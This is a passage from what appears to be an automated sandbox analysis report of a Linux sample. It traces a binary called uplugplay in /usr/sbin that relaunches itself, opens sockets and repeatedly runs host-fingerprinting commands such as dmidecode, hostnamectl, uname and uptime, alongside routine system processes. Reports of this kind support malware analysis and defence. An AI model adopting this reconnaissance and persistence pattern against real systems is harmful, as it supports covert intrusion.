File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: snapd-env-generator PID: 5433, Parent PID: 5432

General

Start time (UTC):	20:20:31
Start date (UTC):	25/03/2025
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

File Activities

File Opened

File Read

File Written

Chronological Activities

Analysis Process: systemd PID: 5440, Parent PID: 5439

General

Start time (UTC):	20:20:32
Start date (UTC):	25/03/2025
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: snapd-env-generator PID: 5440, Parent PID: 5439

General

Start time (UTC):	20:20:32
Start date (UTC):	25/03/2025
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

File Activities

File Opened

File Read

File Written

Chronological Activities

Analysis Process: systemd PID: 5444, Parent PID: 1

General

Start time (UTC):	20:20:33
Start date (UTC):	25/03/2025
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: uplugplay PID: 5444, Parent PID: 1

General

Start time (UTC):	20:20:33
Start date (UTC):	25/03/2025
Path:	/usr/sbin/uplugplay
Arguments:	/usr/sbin/uplugplay
File size:	435932 bytes
MD5 hash:	e2d5c1f255db046b94090a92b2aa672f

File Activities

File Opened

Process Activities

Process Forked

Thread Sleep

System Activities

Query System Information (uname)

Chronological Activities

Analysis Process: uplugplay PID: 5455, Parent PID: 5444

General

Start time (UTC):	20:20:33
Start date (UTC):	25/03/2025
Path:	/usr/sbin/uplugplay
Arguments:	-
File size:	435932 bytes
MD5 hash:	e2d5c1f255db046b94090a92b2aa672f

File Activities

File Opened

Process Activities

Process Forked

Chronological Activities

Analysis Process: uplugplay PID: 5456, Parent PID: 5455

General

Start time (UTC):	20:20:33
Start date (UTC):	25/03/2025
Path:	/usr/sbin/uplugplay
Arguments:	-
File size:	435932 bytes
MD5 hash:	e2d5c1f255db046b94090a92b2aa672f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 5456, Parent PID: 5455

General

Start time (UTC):	20:20:33
Start date (UTC):	25/03/2025
Path:	/bin/sh
Arguments:	sh -c "/usr/sbin/uplugplay -Dcomsvc"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 5457, Parent PID: 5456

General

Start time (UTC):	20:20:33
Start date (UTC):	25/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: uplugplay PID: 5457, Parent PID: 5456

General

Start time (UTC):	20:20:33
Start date (UTC):	25/03/2025
Path:	/usr/sbin/uplugplay
Arguments:	/usr/sbin/uplugplay -Dcomsvc
File size:	435932 bytes
MD5 hash:	e2d5c1f255db046b94090a92b2aa672f

File Activities

File Opened

File Read

File Written

Process Activities

Process Forked

Thread Sleep

System Activities

Query System Information (uname)

Network Activities

Socket Listening

Socket Connecting

Chronological Activities

Analysis Process: uplugplay PID: 5461, Parent PID: 5457

General

Start time (UTC):	20:20:34
Start date (UTC):	25/03/2025
Path:	/usr/sbin/uplugplay
Arguments:	-
File size:	435932 bytes
MD5 hash:	e2d5c1f255db046b94090a92b2aa672f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 5461, Parent PID: 5457

General

Start time (UTC):	20:20:34
Start date (UTC):	25/03/2025
Path:	/bin/sh
Arguments:	sh -c hostnamectl
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 5462, Parent PID: 5461

General

Start time (UTC):	20:20:34
Start date (UTC):	25/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: hostnamectl PID: 5462, Parent PID: 5461

General

Start time (UTC):	20:20:34
Start date (UTC):	25/03/2025
Path:	/usr/bin/hostnamectl
Arguments:	hostnamectl
File size:	26848 bytes
MD5 hash:	b1245aa6d3c28b5d5fedb2d681d32eb9

File Activities

File Opened

File Read

Process Activities

Prctl Requested

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: uplugplay PID: 5596, Parent PID: 5457

General

Start time (UTC):	20:20:35
Start date (UTC):	25/03/2025
Path:	/usr/sbin/uplugplay
Arguments:	-
File size:	435932 bytes
MD5 hash:	e2d5c1f255db046b94090a92b2aa672f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 5596, Parent PID: 5457

General

Start time (UTC):	20:20:35
Start date (UTC):	25/03/2025
Path:	/bin/sh
Arguments:	sh -c hostnamectl
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 5597, Parent PID: 5596

General

Start time (UTC):	20:20:35
Start date (UTC):	25/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: hostnamectl PID: 5597, Parent PID: 5596

General

Start time (UTC):	20:20:35
Start date (UTC):	25/03/2025
Path:	/usr/bin/hostnamectl
Arguments:	hostnamectl
File size:	26848 bytes
MD5 hash:	b1245aa6d3c28b5d5fedb2d681d32eb9

File Activities

File Opened

File Read

Process Activities

Prctl Requested

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: uplugplay PID: 5606, Parent PID: 5457

General

Start time (UTC):	20:20:36
Start date (UTC):	25/03/2025
Path:	/usr/sbin/uplugplay
Arguments:	-
File size:	435932 bytes
MD5 hash:	e2d5c1f255db046b94090a92b2aa672f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 5606, Parent PID: 5457

General

Start time (UTC):	20:20:36
Start date (UTC):	25/03/2025
Path:	/bin/sh
Arguments:	sh -c "dmidecode --type baseboard"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 5610, Parent PID: 5606

General

Start time (UTC):	20:20:36
Start date (UTC):	25/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: dmidecode PID: 5610, Parent PID: 5606

General

Start time (UTC):	20:20:36
Start date (UTC):	25/03/2025
Path:	/usr/sbin/dmidecode
Arguments:	dmidecode --type baseboard
File size:	121856 bytes
MD5 hash:	37284ba29446fb2dadf1ce80f8139c1a

File Activities

File Opened

File Read

Chronological Activities

Analysis Process: uplugplay PID: 5609, Parent PID: 5457

General

Start time (UTC):	20:20:36
Start date (UTC):	25/03/2025
Path:	/usr/sbin/uplugplay
Arguments:	-
File size:	435932 bytes
MD5 hash:	e2d5c1f255db046b94090a92b2aa672f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 5609, Parent PID: 5457

General

Start time (UTC):	20:20:36
Start date (UTC):	25/03/2025
Path:	/bin/sh
Arguments:	sh -c uptime
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 5613, Parent PID: 5609

General

Start time (UTC):	20:20:36
Start date (UTC):	25/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: uptime PID: 5613, Parent PID: 5609

General

Start time (UTC):	20:20:36
Start date (UTC):	25/03/2025
Path:	/usr/bin/uptime
Arguments:	uptime
File size:	14568 bytes
MD5 hash:	3ad70d8e33316ac713bf25c2ddf2fb14

File Activities

File Opened

File Read

Chronological Activities

Analysis Process: uplugplay PID: 5620, Parent PID: 5457

General

Start time (UTC):	20:20:36
Start date (UTC):	25/03/2025
Path:	/usr/sbin/uplugplay
Arguments:	-
File size:	435932 bytes
MD5 hash:	e2d5c1f255db046b94090a92b2aa672f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 5620, Parent PID: 5457

General

Start time (UTC):	20:20:36
Start date (UTC):	25/03/2025
Path:	/bin/sh
Arguments:	sh -c "uname -a"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 5621, Parent PID: 5620

General

Start time (UTC):	20:20:37
Start date (UTC):	25/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: uname PID: 5621, Parent PID: 5620

General

Start time (UTC):	20:20:37
Start date (UTC):	25/03/2025
Path:	/usr/bin/uname
Arguments:	uname -a
File size:	39288 bytes
MD5 hash:	4ac7c634c5bec95753c480e9d421dcc2

File Activities

File Opened

File Read

System Activities

Query System Information (uname)

Chronological Activities

Analysis Process: uplugplay PID: 5624, Parent PID: 5457

General

Start time (UTC):	20:20:37
Start date (UTC):	25/03/2025
Path:	/usr/sbin/uplugplay
Arguments:	-
File size:	435932 bytes
MD5 hash:	e2d5c1f255db046b94090a92b2aa672f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 5624, Parent PID: 5457

General

Start time (UTC):	20:20:37
Start date (UTC):	25/03/2025
Path:	/bin/sh
Arguments:	sh -c "dmidecode --type baseboard"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 5627, Parent PID: 5624

General

Start time (UTC):	20:20:37
Start date (UTC):	25/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: dmidecode PID: 5627, Parent PID: 5624

General

Start time (UTC):	20:20:37
Start date (UTC):	25/03/2025
Path:	/usr/sbin/dmidecode
Arguments:	dmidecode --type baseboard
File size:	121856 bytes
MD5 hash:	37284ba29446fb2dadf1ce80f8139c1a

File Activities

File Opened

File Read

Chronological Activities

Analysis Process: uplugplay PID: 5632, Parent PID: 5457

General

Start time (UTC):	20:20:37
Start date (UTC):	25/03/2025
Path:	/usr/sbin/uplugplay
Arguments:	-
File size:	435932 bytes
MD5 hash:	e2d5c1f255db046b94090a92b2aa672f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 5632, Parent PID: 5457

General

Start time (UTC):	20:20:37
Start date (UTC):	25/03/2025
Path:	/bin/sh
Arguments:	sh -c "dmidecode --type baseboard"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 5633, Parent PID: 5632

General

Start time (UTC):	20:20:37
Start date (UTC):	25/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: dmidecode PID: 5633, Parent PID: 5632

General

Start time (UTC):	20:20:37
Start date (UTC):	25/03/2025
Path:	/usr/sbin/dmidecode
Arguments:	dmidecode --type baseboard
File size:	121856 bytes
MD5 hash:	37284ba29446fb2dadf1ce80f8139c1a

File Activities

File Opened

File Read

Chronological Activities

Analysis Process: uplugplay PID: 5638, Parent PID: 5457

General

Start time (UTC):	20:20:37
Start date (UTC):	25/03/2025
Path:	/usr/sbin/uplugplay
Arguments:	-
File size:	435932 bytes
MD5 hash:	e2d5c1f255db046b94090a92b2aa672f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 5638, Parent PID: 5457

General

Start time (UTC):	20:20:37
Start date (UTC):	25/03/2025
Path:	/bin/sh
Arguments:	sh -c dmidecode
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 5639, Parent PID: 5638

General

Start time (UTC):	20:20:37
Start date (UTC):	25/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: dmidecode PID: 5639, Parent PID: 5638

General

Start time (UTC):	20:20:37
Start date (UTC):	25/03/2025
Path:	/usr/sbin/dmidecode
Arguments:	dmidecode
File size:	121856 bytes
MD5 hash:	37284ba29446fb2dadf1ce80f8139c1a

File Activities

File Opened

File Read

Chronological Activities

Analysis Process: uplugplay PID: 5646, Parent PID: 5457

General

Start time (UTC):	20:20:39
Start date (UTC):	25/03/2025
Path:	/usr/sbin/uplugplay
Arguments:	-
File size:	435932 bytes
MD5 hash:	e2d5c1f255db046b94090a92b2aa672f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 5646, Parent PID: 5457

General

Start time (UTC):	20:20:39
Start date (UTC):	25/03/2025
Path:	/bin/sh
Arguments:	sh -c uptime
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 5647, Parent PID: 5646

General

Start time (UTC):	20:20:39
Start date (UTC):	25/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: uptime PID: 5647, Parent PID: 5646

General

Start time (UTC):	20:20:39
Start date (UTC):	25/03/2025
Path:	/usr/bin/uptime
Arguments:	uptime
File size:	14568 bytes
MD5 hash:	3ad70d8e33316ac713bf25c2ddf2fb14

File Activities

File Opened

File Read

Chronological Activities

Analysis Process: uplugplay PID: 5650, Parent PID: 5457

General

Start time (UTC):	20:20:39
Start date (UTC):	25/03/2025
Path:	/usr/sbin/uplugplay
Arguments:	-
File size:	435932 bytes
MD5 hash:	e2d5c1f255db046b94090a92b2aa672f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 5650, Parent PID: 5457

General

Start time (UTC):	20:20:39
Start date (UTC):	25/03/2025
Path:	/bin/sh
Arguments:	sh -c "uname -a"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 5651, Parent PID: 5650

General

Start time (UTC):	20:20:39
Start date (UTC):	25/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: uname PID: 5651, Parent PID: 5650

General

Start time (UTC):	20:20:39
Start date (UTC):	25/03/2025
Path:	/usr/bin/uname
Arguments:	uname -a
File size:	39288 bytes
MD5 hash:	4ac7c634c5bec95753c480e9d421dcc2

File Activities

File Opened

File Read

System Activities

Query System Information (uname)

Chronological Activities

Analysis Process: systemd PID: 5463, Parent PID: 1

General

Start time (UTC):	20:20:35
Start date (UTC):	25/03/2025
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: systemd-hostnamed PID: 5463, Parent PID: 1

General

Start time (UTC):	20:20:35
Start date (UTC):	25/03/2025
Path:	/lib/systemd/systemd-hostnamed
Arguments:	/lib/systemd/systemd-hostnamed
File size:	35040 bytes
MD5 hash:	2cc8a5576629a2d5bd98e49a4b8bef65

File Activities

File Opened

File Read

Process Activities

Prctl Requested

System Activities

Query System Information (uname)

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: fwupd PID: 5599, Parent PID: 1

General

Start time (UTC):	20:20:35
Start date (UTC):	25/03/2025
Path:	/usr/libexec/fwupd/fwupd
Arguments:	-
File size:	260616 bytes
MD5 hash:	9baeed1d7c56e92aea5277bdf8b4373f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: gpgconf PID: 5599, Parent PID: 1

General

Start time (UTC):	20:20:35
Start date (UTC):	25/03/2025
Path:	/usr/bin/gpgconf
Arguments:	/usr/bin/gpgconf --list-dirs
File size:	178848 bytes
MD5 hash:	ddc6865fed36b9020dfd6fe9d360ebbb

File Activities

File Opened

File Read

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: fwupd PID: 5601, Parent PID: 1

General

Start time (UTC):	20:20:35
Start date (UTC):	25/03/2025
Path:	/usr/libexec/fwupd/fwupd
Arguments:	-
File size:	260616 bytes
MD5 hash:	9baeed1d7c56e92aea5277bdf8b4373f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: gpgconf PID: 5601, Parent PID: 1

General

Start time (UTC):	20:20:35
Start date (UTC):	25/03/2025
Path:	/usr/bin/gpgconf
Arguments:	/usr/bin/gpgconf --list-components
File size:	178848 bytes
MD5 hash:	ddc6865fed36b9020dfd6fe9d360ebbb

File Activities

File Opened

File Read

Chronological Activities

Analysis Process: fwupd PID: 5603, Parent PID: 1

General

Start time (UTC):	20:20:35
Start date (UTC):	25/03/2025
Path:	/usr/libexec/fwupd/fwupd
Arguments:	-
File size:	260616 bytes
MD5 hash:	9baeed1d7c56e92aea5277bdf8b4373f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: gpg PID: 5603, Parent PID: 1

General

Start time (UTC):	20:20:35
Start date (UTC):	25/03/2025
Path:	/usr/bin/gpg
Arguments:	/usr/bin/gpg --version
File size:	1066992 bytes
MD5 hash:	3c2e7402cc788b3a878a1d2bea56afbf

File Activities

File Opened

File Read

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: fwupd PID: 5612, Parent PID: 1

General

Start time (UTC):	20:20:36
Start date (UTC):	25/03/2025
Path:	/usr/libexec/fwupd/fwupd
Arguments:	-
File size:	260616 bytes
MD5 hash:	9baeed1d7c56e92aea5277bdf8b4373f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: gpgsm PID: 5612, Parent PID: 1

General

Start time (UTC):	20:20:36
Start date (UTC):	25/03/2025
Path:	/usr/bin/gpgsm
Arguments:	/usr/bin/gpgsm --version
File size:	519416 bytes
MD5 hash:	66be603a7085efc7ee3140d2ff597485

File Activities

File Opened

File Read

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: fwupd PID: 5615, Parent PID: 1

General

Start time (UTC):	20:20:36
Start date (UTC):	25/03/2025
Path:	/usr/libexec/fwupd/fwupd
Arguments:	-
File size:	260616 bytes
MD5 hash:	9baeed1d7c56e92aea5277bdf8b4373f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: gpgconf PID: 5615, Parent PID: 1

General

Start time (UTC):	20:20:36
Start date (UTC):	25/03/2025
Path:	/usr/bin/gpgconf
Arguments:	/usr/bin/gpgconf --version
File size:	178848 bytes
MD5 hash:	ddc6865fed36b9020dfd6fe9d360ebbb

File Activities

File Opened

File Read

Chronological Activities

Analysis Process: fwupd PID: 5617, Parent PID: 1

General

Start time (UTC):	20:20:36
Start date (UTC):	25/03/2025
Path:	/usr/libexec/fwupd/fwupd
Arguments:	-
File size:	260616 bytes
MD5 hash:	9baeed1d7c56e92aea5277bdf8b4373f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: gpg PID: 5617, Parent PID: 1

General

Start time (UTC):	20:20:36
Start date (UTC):	25/03/2025
Path:	/usr/bin/gpg
Arguments:	/usr/bin/gpg --version
File size:	1066992 bytes
MD5 hash:	3c2e7402cc788b3a878a1d2bea56afbf

File Activities

File Opened

File Read

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: fwupd PID: 5626, Parent PID: 1

General

Start time (UTC):	20:20:37
Start date (UTC):	25/03/2025
Path:	/usr/libexec/fwupd/fwupd
Arguments:	-
File size:	260616 bytes
MD5 hash:	9baeed1d7c56e92aea5277bdf8b4373f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: gpg PID: 5626, Parent PID: 1

General

Start time (UTC):	20:20:37
Start date (UTC):	25/03/2025
Path:	/usr/bin/gpg
Arguments:	gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 24 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 26 --import -- -&27
File size:	1066992 bytes
MD5 hash:	3c2e7402cc788b3a878a1d2bea56afbf

File Activities

File Opened

File Deleted

File Read

File Written

Link Created

System Activities

Query System Information (uname)

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: fwupd PID: 5635, Parent PID: 1

General

Start time (UTC):	20:20:37
Start date (UTC):	25/03/2025
Path:	/usr/libexec/fwupd/fwupd
Arguments:	-
File size:	260616 bytes
MD5 hash:	9baeed1d7c56e92aea5277bdf8b4373f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: gpg PID: 5635, Parent PID: 1

General

Start time (UTC):	20:20:37
Start date (UTC):	25/03/2025
Path:	/usr/bin/gpg
Arguments:	gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 24 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 26 --import -- -&27
File size:	1066992 bytes
MD5 hash:	3c2e7402cc788b3a878a1d2bea56afbf

File Activities

File Opened

File Deleted

File Read

File Written

Link Created

System Activities

Query System Information (uname)

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: fwupd PID: 5641, Parent PID: 1

General

Start time (UTC):	20:20:37
Start date (UTC):	25/03/2025
Path:	/usr/libexec/fwupd/fwupd
Arguments:	-
File size:	260616 bytes
MD5 hash:	9baeed1d7c56e92aea5277bdf8b4373f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: gpg PID: 5641, Parent PID: 1

General

Start time (UTC):	20:20:37
Start date (UTC):	25/03/2025
Path:	/usr/bin/gpg
Arguments:	gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 23 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 25 --verify -- -&26 -&28
File size:	1066992 bytes
MD5 hash:	3c2e7402cc788b3a878a1d2bea56afbf

File Activities

File Opened

File Deleted

File Read

File Written

Link Created

System Activities

Query System Information (uname)

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: fwupd PID: 5643, Parent PID: 1

General

Start time (UTC):	20:20:39
Start date (UTC):	25/03/2025
Path:	/usr/libexec/fwupd/fwupd
Arguments:	-
File size:	260616 bytes
MD5 hash:	9baeed1d7c56e92aea5277bdf8b4373f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: gpg PID: 5643, Parent PID: 1

General

Start time (UTC):	20:20:39
Start date (UTC):	25/03/2025
Path:	/usr/bin/gpg
Arguments:	gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 23 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 25 --verify -- -&26 -&28
File size:	1066992 bytes
MD5 hash:	3c2e7402cc788b3a878a1d2bea56afbf

File Activities

File Opened

File Deleted

File Read

File Written

Link Created

System Activities

Query System Information (uname)

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: dash PID: 5665, Parent PID: 3585

General

Start time (UTC):	20:20:59
Start date (UTC):	25/03/2025
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: rm PID: 5665, Parent PID: 3585

General

Start time (UTC):	20:20:59
Start date (UTC):	25/03/2025
Path:	/usr/bin/rm
Arguments:	rm -f /tmp/tmp.kfY4W8g8cA /tmp/tmp.UsnA55A3DA /tmp/tmp.lNnnmoNhXs
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

File Activities

File Opened

File Deleted

File Read

Chronological Activities

Analysis Process: dash PID: 5666, Parent PID: 3585

General

Start time (UTC):	20:20:59
Start date (UTC):	25/03/2025
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: cat PID: 5666, Parent PID: 3585

General

Start time (UTC):	20:20:59
Start date (UTC):	25/03/2025
Path:	/usr/bin/cat
Arguments:	cat /tmp/tmp.kfY4W8g8cA
File size:	43416 bytes
MD5 hash:	7e9d213e404ad3bb82e4ebb2e1f2c1b3

File Activities

File Opened

File Read

Chronological Activities

Analysis Process: dash PID: 5667, Parent PID: 3585

General

Start time (UTC):	20:20:59
Start date (UTC):	25/03/2025
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: head PID: 5667, Parent PID: 3585

General

Start time (UTC):	20:20:59
Start date (UTC):	25/03/2025
Path:	/usr/bin/head
Arguments:	head -n 10
File size:	47480 bytes
MD5 hash:	fd96a67145172477dd57131396fc9608

File Activities

File Opened

File Read

Chronological Activities

Analysis Process: dash PID: 5668, Parent PID: 3585

General

Start time (UTC):	20:20:59
Start date (UTC):	25/03/2025
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: tr PID: 5668, Parent PID: 3585

General

Start time (UTC):	20:20:59
Start date (UTC):	25/03/2025
Path:	/usr/bin/tr
Arguments:	tr -d \\000-\\011\\013\\014\\016-\\037
File size:	51544 bytes
MD5 hash:	fbd1402dd9f72d8ebfff00ce7c3a7bb5

File Activities

File Opened

File Read

Chronological Activities

Analysis Process: dash PID: 5669, Parent PID: 3585

General

Start time (UTC):	20:20:59
Start date (UTC):	25/03/2025
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: cut PID: 5669, Parent PID: 3585

General

Start time (UTC):	20:20:59
Start date (UTC):	25/03/2025
Path:	/usr/bin/cut
Arguments:	cut -c -80
File size:	47480 bytes
MD5 hash:	d8ed0ea8f22c0de0f8692d4d9f1759d3

File Activities

File Opened

File Read

Chronological Activities

Analysis Process: dash PID: 5670, Parent PID: 3585

General

Start time (UTC):	20:20:59
Start date (UTC):	25/03/2025
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: cat PID: 5670, Parent PID: 3585

General

Start time (UTC):	20:20:59
Start date (UTC):	25/03/2025
Path:	/usr/bin/cat
Arguments:	cat /tmp/tmp.kfY4W8g8cA
File size:	43416 bytes
MD5 hash:	7e9d213e404ad3bb82e4ebb2e1f2c1b3

File Activities

File Opened

File Read

Chronological Activities

Analysis Process: dash PID: 5671, Parent PID: 3585

General

Start time (UTC):	20:20:59
Start date (UTC):	25/03/2025
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: head PID: 5671, Parent PID: 3585

General

Start time (UTC):	20:20:59
Start date (UTC):	25/03/2025
Path:	/usr/bin/head
Arguments:	head -n 10
File size:	47480 bytes
MD5 hash:	fd96a67145172477dd57131396fc9608

File Activities

File Opened

File Read

Chronological Activities

Analysis Process: dash PID: 5672, Parent PID: 3585

General

Start time (UTC):	20:20:59
Start date (UTC):	25/03/2025
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: tr PID: 5672, Parent PID: 3585

General

Start time (UTC):	20:20:59
Start date (UTC):	25/03/2025
Path:	/usr/bin/tr
Arguments:	tr -d \\000-\\011\\013\\014\\016-\\037
File size:	51544 bytes
MD5 hash:	fbd1402dd9f72d8ebfff00ce7c3a7bb5

File Activities

File Opened

File Read

Chronological Activities

Analysis Process: dash PID: 5673, Parent PID: 3585

General

Start time (UTC):	20:20:59
Start date (UTC):	25/03/2025
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
